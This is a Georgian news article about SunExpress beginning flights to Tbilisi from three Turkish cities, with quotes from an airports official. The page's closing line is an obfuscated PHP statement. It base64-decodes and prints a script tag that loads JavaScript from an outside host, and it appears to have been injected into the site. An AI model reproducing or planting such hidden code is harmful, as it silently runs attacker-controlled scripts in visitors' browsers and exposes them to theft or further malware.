celsiusi
ავერსი საქკაბელი

საქართველოს ბაზარზე ოპერირება თურქულ-გერმანულმა ავიაკომპანია SunExpress-მა დაიწყო. საქართველოს აეროპორტების გაერთიანების ინფორმაციით, ავიაკომპანიამ თბილისის საერთაშორისო აეროპორტში ანტალიიდან ბოინგ 737-800-ით პირველი რეგულარული რეისი გამთენიისას შეასრულა და 135 მგზავრი ჩამოიყვანა.

„ორწლიანი მოლაპარაკებების პროცესი საქართველოს აეროპორტების გაერთიანებამ ავიაკომპანიასთან წარმატებით დაასრულა. SunExpress-ი თბილისის საერთაშორისო აეროპორტში ერთდროულად თურქეთის სამი ქალაქიდან: დედაქალაქ ანკარადანანტალიიდან და იზმირიდან კვირაში ხუთი სიხშირით იფრენს“,- აღნიშნავენ აეროპორტების გაერთიანებაში.

საქართველოს აეროპორტების გაერთიანების ბიზნესგანვითარების მენეჯერის, ვაკო ჭილაშვილის განცხადებით, ახალი ავიაკომპანია ბაზარზე კონკურენციას კიდევ უფრო გაზრდის.

„თბილისის საერთაშორისო აეროპორტში ანტალიიდან ავიაკომპანია Sun Express-მა პირველი რეგულარული რეისი განახორციელა. ავიაკომპანია თბილისის მიმართულებით ანტალიიდან და იზმირიდან კვირაში – ორი, ხოლო დედაქალაქ ანკარადან კვირაში ერთი სიხშირით იფრენს.

ჩვენ მოლაპარაკებებს ავიაკომპანიასთან ორ წელზე მეტი ხნის განმავლობაში ვაწარმოებდით და მათი მხრიდან დადებითი გადაწყვეტილება ოპერირების დაწყებასთან დაკავშირებით რამდენიმე თვის წინ იქნა მიღებული. იმედი გვაქვს, რომ ისეთი ახალი ავიაკომპანიის შემოსვლა, როგორიც Sun Express-ია კიდევ უფრო გაზრდის საქართველოს ავიაბაზარზე კონკურენციას, რაც, თავის მხრივ, ხელს შეუწყობს საქართველო-თურქეთს შორის ტურიზმის განვითარებას“, – განაცხადა ვაკო ჭილაშვილმა.

საქართველოს აეროპორტების გაერთიანების ინფორმაციით, SunExpress-ი 33 წლის წინ ანტალიაში დაფუძნებული ავიაკომპანიაა და იზმირისა და ანტალიის ძირითად ავაიგადამზიდავს წარმოადგენს.

„ის გახდა პირველი კერძო ავიაკომპანია, რომელმაც 2001 წელს მომხმარებლებს თურქეთსა და გერმანიას შორის პირდაპირი რეგულარული ფრენები შესთავაზა.

SKYTRAX-ის მიხედვით, SunExpress-ი 2022 წლის საუკეთესო ტურისტულ ავიაკომპანიად დასახელდა“, – აღნიშნულია საქართველოს აეროპორტების გაერთიანების ინფორმაციაში.

281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");